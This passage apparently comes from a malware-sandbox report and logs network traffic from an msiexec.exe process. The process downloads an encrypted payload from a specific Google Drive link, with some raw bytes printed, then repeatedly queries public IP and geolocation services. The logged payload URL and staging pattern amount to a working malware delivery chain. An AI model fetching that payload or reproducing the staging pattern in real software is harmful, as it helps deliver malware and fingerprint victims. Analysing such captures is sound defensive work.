Jan 10, 2025 17:17:34.392492056 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	59377	132.226.8.169	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:17:35.028141022 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:17:35.893280983 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	59379	132.226.8.169	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:17:36.678400040 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:17:37.793323040 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	59381	132.226.8.169	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:17:38.431283951 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:17:39.307950020 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	59383	132.226.8.169	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:17:40.041066885 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:17:40.874217033 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	59385	132.226.8.169	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:17:41.488456964 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:17:42.309870958 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	59387	132.226.8.169	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:17:43.117873907 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:17:43.970401049 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	59370	216.58.206.46	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:26 UTC	216	OUT	GET /uc?export=download&id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-10 16:17:26 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 16:17:26 GMT Location: https://drive.usercontent.google.com/download?id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-f66pECgX1xjZGEKp2UBERQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	59371	142.250.186.129	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:27 UTC	258	OUT	GET /download?id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-10 16:17:29 UTC	4942	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC6m1N7Sr4fbOVDpnCSy1hsOCbSPGIuJ_o2IiJLZtm_poWBAQ-ylIztr_E5w3rVLuJovrQFrh1Y Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="HwqVwuJolMS190.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 277056 Last-Modified: Tue, 24 Dec 2024 10:13:31 GMT Date: Fri, 10 Jan 2025 16:17:29 GMT Expires: Fri, 10 Jan 2025 16:17:29 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=0uA8pA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-10 16:17:29 UTC	4942	IN	Data Raw: ad f0 93 2e f4 8e 13 b2 3a d4 0e 81 d3 31 25 c5 3c 51 ad 06 cf 74 af 35 38 cb 97 e7 bf e7 ef fc 1a 46 e4 77 2a 27 f8 aa 00 84 1b 13 a2 30 5e 9a 45 5c c0 36 70 bc 56 8f e0 64 f5 10 06 de 4b 3b 61 ff ec e9 df 2b ff da 1d 14 3b 0e c3 e7 9e 01 02 9c 5e 90 1d 03 a5 91 00 88 79 18 af f4 41 c5 27 a3 a0 a6 6a 9f 22 ea b6 b1 4c 2c b5 ee 85 ed fc b1 9e 6d 68 4d 2f 74 d5 36 ad 60 ce 0a 13 e3 2b e6 aa ac 61 bc 07 f0 78 81 fb 41 59 fa ce f0 8f 88 07 8e 7f 55 fe 8a 30 e1 ca 1c df 73 36 9a 0d 9c 1a 91 8b a3 13 99 a0 d4 dc 7e ff 99 3d 5c 66 45 4d 15 44 fd 8e 46 8a 1e a1 76 f3 71 a1 2c 0c e4 f7 83 57 d7 11 0b 03 a8 64 69 32 d7 62 77 9e 55 ce bf 4d 8d 66 07 4b 68 48 10 79 5c ae d0 a7 39 f6 fe 6e 6c ed 3b 9a 27 80 79 cf c5 4f 40 a8 fb 31 15 5d 5d a5 17 a0 eb 6a 39 dd 1a 0d Data Ascii: .:1%<Qt58Fw*'0^E\6pVdK;a+;^yA'j"L,mhM/t6`+axAYU0s6~=\fEMDFvq,Wdi2bwUMfKhHy\9nl;'yO@1]]j9
2025-01-10 16:17:29 UTC	4815	IN	Data Raw: 4c e4 7e a0 f2 64 5f 77 38 05 29 55 05 04 d0 1e 51 39 f1 5c b3 8a e0 c9 76 de cd 88 f9 84 32 d1 03 78 ac 4a c7 10 3d ca 39 cf ad 51 a5 9f 45 2f 0b de 5f b0 c2 69 b3 cf 16 09 79 8a c0 69 1c 61 fd cd ec 4f 90 46 87 32 9f b1 6e 71 5b 35 f3 f7 a2 3f 9e 23 7a 60 a6 27 72 b4 69 c7 6d 82 90 6d 05 48 c5 64 67 23 d7 ac 10 18 97 e2 24 97 8e 94 cf 7f 9d 80 3d d8 21 db e0 bf cf 6b 95 ae 1b 58 27 fb 40 58 36 74 f6 97 c7 86 61 08 24 ca 86 92 f3 b1 79 48 07 ad 63 0b 1e 1d 54 29 2e 92 34 99 1a 62 19 ae 4d 4c fe 15 78 29 4c 74 c5 18 c4 32 d6 4f 54 15 19 aa 02 4e eb bb d0 65 dd ae 3f 5d 04 96 1d f2 7a ee 85 e9 e9 7f a2 ab a7 e9 ce 8a a7 f7 9b 32 e1 86 cf 12 74 0b 28 32 6f 53 62 dd ee d0 d2 89 9e 40 09 fa be 7b 4e 4d 3b 8f db 1b f2 76 d9 ef 2d 8b 2e b9 6b 04 df 9c 58 d3 8e Data Ascii: L~d_w8)UQ9\v2xJ=9QE/_iyiaOF2nq[5?#z`'rimmHdg#$=!kX'@X6ta$yHcT).4bMLx)Lt2OTNe?]z2t(2oSb@{NM;v-.kX
2025-01-10 16:17:29 UTC	1322	IN	Data Raw: 26 fe 0d 30 99 24 8f 9f cf 57 8a 1d 58 ff 6a b9 78 dc c9 d1 66 fd 5d e3 b4 5e bb d6 6e 7c 75 18 29 70 6e 82 16 4e ae 6e b7 5e 72 71 a1 26 4a 5f f6 90 1d c7 14 32 19 2f f4 0f 4c f8 62 77 9a 27 bd af ad fd 72 2e c1 69 18 1a 6f 86 ab c3 a0 3c f1 c7 5e 6d ed 3b c4 70 7a 7f f2 e5 4f 46 db 5b 35 15 57 75 24 17 a0 c1 6a 4a 1f 18 0d b7 43 ce 65 64 ec 25 ec c3 e5 70 75 c8 13 5a 79 d4 a5 ef 80 65 c9 38 64 32 90 96 e0 b1 9f 4e 1c 5e 47 dd 87 e8 5d 8d 00 6c 2e f7 08 fc 10 d8 4b fc 78 e8 fa 1b 6b 4f 72 7a 93 b7 0e c4 48 53 bf de 94 4b be 4f b1 28 76 d4 c9 b6 e1 4a 74 ab 9b 90 1e 5f 92 9e 89 cd 6a 96 7c 7d 27 1a 75 5d 4b 44 13 11 8c 3e b8 60 d6 d7 aa 8b 61 b8 cd 5f 4a 0d a2 e8 6d db 7c 10 6c c2 3d 21 ab 39 02 31 04 97 e4 57 e3 ce a0 8c 2b b4 b8 dc f1 1a 35 ee 1d 85 4d Data Ascii: &0$WXjxf]^n\|u)pnNn^rq&J_2/Lbw'r.io<^m;pzOF[5Wu$jJCed%puZye8d2N^G]l.KxkOrzHSKO(vJt_j\|}'u]KD>`a_Jm\|l=!91W+5M
2025-01-10 16:17:29 UTC	1390	IN	Data Raw: e5 36 83 99 68 6a 9f 22 c2 ec b1 4c 26 a8 63 c5 ed fc b0 bb 7b 1a 00 20 74 a5 94 88 77 66 be 13 e3 2f 5b 35 ba 13 6f 01 3d 29 9b df 14 ea e3 9a 98 e2 59 02 e4 7f b1 96 f8 21 2e cf 64 c0 37 58 f5 7d 1e 5d e8 d9 48 69 f7 f0 1f 9a 2b bb d6 64 13 57 2a 29 7a 79 d1 98 c1 ee 1e a1 77 d6 67 d3 df 4e a1 87 21 3e c1 3a bf da 2d fe ad 17 cf 10 10 91 55 be 1d 88 94 1a 3e 40 69 1c b2 5c 62 d8 e1 a4 2d 86 5c 46 19 ed 3b ce 77 a6 6f e7 93 4f 40 a2 9b 15 15 51 5d e5 3f d7 cb 6a 33 dd 18 73 82 50 c6 70 7d b3 6d cd d0 e1 73 c8 d7 13 50 12 38 ec ef 8a 6f c9 12 75 b7 90 96 ee e7 9c 4e 1c 5c 28 c5 97 cd 7f b9 11 64 56 7d 3b fc 48 92 ff fc 72 3c 88 b4 7b 4f 7c 65 c8 b7 0a bc b2 96 bf ae 88 63 2e 47 ac af 20 2a c8 a4 e0 4d 22 ca c8 8d e3 bd b7 89 a0 5c 7c e4 3b d0 02 72 a5 1f Data Ascii: 6hj"L&c{ twf/[5o=)Y!.d7X}]Hi+dW)zywgN!>:-U>@i\b-\F;woO@Q]?j3sPp}msP8ouN\(dV};Hr<{O\|ec.G M"\\|;r
2025-01-10 16:17:29 UTC	1390	IN	Data Raw: 5e 94 86 1f 0f 42 2f 04 77 13 b4 1e 76 0a 13 e7 87 dc 0a d0 9c 18 0e 4d fb 11 8f 0d 94 d1 f5 50 e6 fb 2d fe 73 11 99 f8 55 ff 07 7f be 17 4b f2 68 ba 17 25 ab d1 6c e6 87 d2 61 5e bb dc 6e 02 37 2a 29 74 19 39 83 4c a4 0d a9 08 c2 71 a1 28 2e 34 f5 83 6b c0 3a 8a da 2d fe 19 cc d6 71 7e 8f 5c e2 b3 bc 85 73 69 8a 69 18 1a 79 78 81 db a7 3c fe e8 01 a6 ed 3b ce 64 84 68 c7 9b 71 40 a8 9f 1d de 5d 5d ef 78 6c cb 6a 33 dd 09 05 c3 6a c6 74 68 ec 24 ec c3 e5 70 0a c8 13 5a 79 dd a5 ef 80 65 c9 38 1a f1 ff 58 ea cf a8 4e 0d 5c 47 d4 87 e8 5d 8d 39 00 5c 6e 1e fc be e0 da d4 4c e2 88 be 68 45 02 7a aa b7 0e c4 f9 94 bf de 9e 35 9a 47 ac a1 44 41 cb b7 b4 4a 2e 67 94 90 64 eb 49 88 b2 72 7b 9d 4f 14 03 02 07 44 6f 44 63 b7 81 cc c6 58 dc c4 a2 57 72 a2 bf d0 37 Data Ascii: ^B/wvMP-sUKh%la^n7*)t9Lq(.4k:-q~\siiyx<;dhq@]]xlj3jth$pZye8XN\G]9\nLhEz5GDAJ.gdIr{ODoDcXWr7
2025-01-10 16:17:29 UTC	1390	IN	Data Raw: d3 0b 92 68 08 ca 3a 59 39 da 0d 94 ca 9a e6 fa fb 27 fa 62 d4 99 f8 5b fe b0 7e be 6d 4e dd f8 bc 78 fe bd 2f 65 fd 86 84 10 59 bb d6 10 4f 0b 2a 2d 02 ff f2 83 3c b8 36 20 76 f3 7b b7 d2 5d aa f0 ba 3f d7 12 0b ce fd a1 0f 32 d6 4a 5a 9e 55 c4 cd 86 9d 64 76 57 e4 1b 10 79 79 8f c6 d9 69 f6 fe 6a 44 e9 3b c4 62 eb c0 cf e5 45 32 8f 8e 35 65 75 06 e5 17 aa b5 21 39 dd 1c 25 f7 50 c6 7e 12 8d 1f ec c7 c9 49 b6 c8 19 f2 02 04 b1 c7 30 65 d8 3a 7f 74 90 96 eb c3 a2 46 6e 33 38 1b f7 87 ec 8d 11 6e 5c 66 66 be 60 f0 fb 82 3b e2 88 b0 08 f3 02 52 c2 d8 b3 ce 27 9e bf f6 c4 4b af 4d b1 28 76 d4 c9 b6 e1 4a 74 fd 81 90 1e 5f 92 9e 89 cd 6a 96 7c 7d 27 1a 75 5d 4b 44 13 11 8c 3e b8 60 d6 d7 aa 8b 61 b8 cd 5f 4a 0d a2 e8 6d db 7c 26 6c c2 3d ec 60 25 70 a2 a9 b2 Data Ascii: h:Y9'b[~mNx/eYO*-<6 v{]?2JZUdvWyyijD;bE25eu!9%P~I0e:tFn38n\ff`;R'KM(vJt_j\|}'u]KD>`a_Jm\|&l=`%p
2025-01-10 16:17:29 UTC	1390	IN	Data Raw: 36 e4 7e 93 99 f8 5b 9f f6 6e a2 72 23 f5 79 b6 6b e9 ba cd 09 5c 80 bd b8 5e aa cc 01 d6 0b 2a 23 70 7b eb ec 97 ae 1e ab 76 f3 49 62 2c 5c a1 f7 83 0d fe 64 0b da 27 f4 2f 32 db 62 77 b6 22 ce bf a7 8d 78 8b 00 69 18 11 5c 6e d8 76 ac 2d 86 d6 2f 6c ed 3d 66 41 93 07 8a e5 4f 44 0a be 2d 67 b6 4c e5 67 88 8b 6a 39 db ba 28 a4 2e 80 74 6c 96 bd c9 d9 93 14 a4 c8 63 f2 33 0b be 62 ca 65 d8 31 2e e1 e2 0f fa cf d2 ec 39 4d 00 af 87 e8 5d 2f 34 7c 2e ff 0d fc 10 52 da e5 50 56 88 b4 71 ed 27 48 ba c4 1c ce 57 36 97 ab 9e 4b a5 e5 84 d0 36 d4 c3 a4 da 2e df f3 94 e0 10 e2 b7 89 a5 51 23 96 76 d5 70 c5 15 3a 34 6c 21 b3 a9 21 d7 46 c7 c3 86 6d 44 a2 b9 d4 98 8c d3 4a 48 e5 2a 0e 6c c2 33 90 91 25 58 ca 0b 97 9e 2b cb bb a0 8c 21 a5 44 dc f1 14 47 05 23 85 3d Data Ascii: 6~[nr#yk\^#p{vIb,\d'/2bw"xi\nv-/l=fAOD-gLgj9(.tlc3be1.9M]/4\|.RPVq'HW6K6.Q#vp:4l!!FmDJHl3%X+!DG#=
2025-01-10 16:17:29 UTC	1390	IN	Data Raw: 7a c2 be 38 f7 80 b7 b2 57 d4 7c 6e 7c 01 2a f7 7c 6a f9 af 4b a7 71 a0 76 f3 7b a1 f0 82 b2 d2 ab 2f d6 12 01 c9 29 f4 27 50 d7 62 7d 43 36 c8 bf ad 8d 64 06 3e 5b 18 10 7d 0a 3f d2 a7 5d e0 d6 ef 6c ed 31 d2 9a 85 6a ca f4 4a 79 62 99 35 15 23 72 e5 17 a4 b9 19 29 dd 68 1b 95 d1 c6 74 66 84 e1 ed d0 e7 12 b0 f1 23 51 16 10 a5 fb 74 63 e5 30 0b f1 e3 56 ea cf a8 66 dd 5a 28 11 87 9b 95 8d 11 6e 4f 69 09 fb 1e ca ff fc 7c 91 4b b4 7b 45 6d 96 c8 b7 04 ce 36 93 d0 1b 9e 4b a5 39 91 a5 36 d0 a6 71 c4 5c 0c e6 85 97 1c 64 a7 89 d1 51 de 96 76 d5 70 ad 17 3a 34 6c 38 b3 a9 2d a9 9f d6 d7 a4 29 55 a5 a2 59 05 0d d2 4b 6d d6 70 01 7a c2 49 21 ab 32 58 1c 0b 97 9e 57 ee a3 d2 eb 2e db 00 7e d4 09 4b a8 21 85 49 60 d4 54 22 02 29 69 57 69 10 f4 8e f0 58 6b e2 63 Data Ascii: z8W\|n\|*\|jKqv{/)'Pb}C6d>[}?]l1jJyb5#r)htf#Qtc0VfZ(nOi\|K{Em6K96q\dQvp:4l8-)UYKmpzI!2XW.~K!I`T")iWiXkc
2025-01-10 16:17:29 UTC	1390	IN	Data Raw: 0d ff 83 3c 0c 3b b8 08 cb 71 a1 28 fe 84 ed f1 2a d5 12 7b 78 08 ef 71 12 d7 62 73 3c 70 d2 cd ea 9b 64 76 e2 41 6d 10 79 72 c5 8c a7 2d fc ed 4c 77 60 7b c4 64 85 5c d9 97 16 57 a8 eb 97 30 4a 75 51 17 a0 c1 c8 1c c5 6a 6a b2 50 b6 d6 49 8b 61 d4 c3 e1 07 14 ed 09 22 27 13 a5 9f 28 4d ad 30 0b fd 83 b5 fc e7 d4 4e 1c 50 28 3b 87 e4 57 8d 39 13 5c 6e 12 fc 60 8e c0 fc 78 e6 99 96 09 36 15 52 b8 c9 11 ce 27 90 97 97 9e 4b a5 56 8f db 76 d4 c9 b3 ec 62 06 e6 92 90 b0 ed 92 a1 95 79 6a 9c 65 fb 02 2a 65 3a 44 4e bd b3 a9 27 c6 26 e1 d7 ae 2d 36 37 bd d4 35 1b fa cb 48 c0 08 2c 92 c3 2a a6 9f 00 5c f4 16 1a d4 f5 cb ba 85 9a 53 e0 66 dc 81 b2 10 87 09 31 4d c2 fb ec 75 2b 58 0e 28 cb 45 4d d5 c9 26 53 e6 c1 56 ab a0 e0 ca 42 0a 59 50 21 f4 cf 61 0b 92 2a 3e Data Ascii: <;q({xqbs<pdvAmyr-Lw`{d\W0JuQjjPIa"'(M0NP(;W9\n`x6R'KVvbyjee:DN'&-675H,\Sf1Mu+X(EM&SVBYP!a>
2025-01-10 16:17:29 UTC	1390	IN	Data Raw: a8 23 0b da 29 86 9a 30 d7 12 61 b6 d4 ce bf a7 9b 9a 07 53 7b 09 02 55 74 bb c1 b0 42 3c fe 6e 66 ed 3b ef 6f 84 68 de f3 20 8a a8 9b 3f 15 5d 4c f4 69 9e cb 6a 3d f5 d3 0d bd 5a a9 b8 6c 92 15 ec d2 f0 7d 8c c8 13 54 68 2b a5 ef 8e 16 64 30 0b fd ff 5b ea cf a8 4e 0d 4b 39 17 e8 26 57 8d 1b 64 4d 62 77 33 60 f0 f5 fc a6 f2 ad 9c 4f 4f 02 58 db a4 0e e6 45 94 bf d4 40 4b af 47 ac a5 36 aa fc b7 c4 58 74 73 96 90 1e eb 9f 08 a1 79 60 80 88 de 11 16 16 2e 7d bf 62 b3 a9 3a 4b 18 d6 d7 af 0c 52 d0 84 c2 45 7d 70 6f 5f e8 b6 3a 6c c8 9b a6 96 57 17 a7 0b e7 36 d0 d2 c5 98 8c 21 df d2 f9 eb 62 04 93 21 f5 ef e7 ea 30 70 33 2a 6d 85 ee 29 9d b7 c6 58 1b 44 e9 27 09 85 f0 ab 66 77 6f 20 83 d5 a6 2e 3a 92 5a 2c e5 f4 ec 0f 97 44 5e 88 2f 9b 1b 02 de dc 0b 26 81 Data Ascii: #)0aS{UtB<nf;oh ?]Lij=Zl}Th+d0[NK9&WdMbw3`OOXE@KG6Xtsy`.}b:KRE}po_:lW6!b!0p3*m)XD'fwo .:Z,D^/&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	59373	104.21.80.1	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
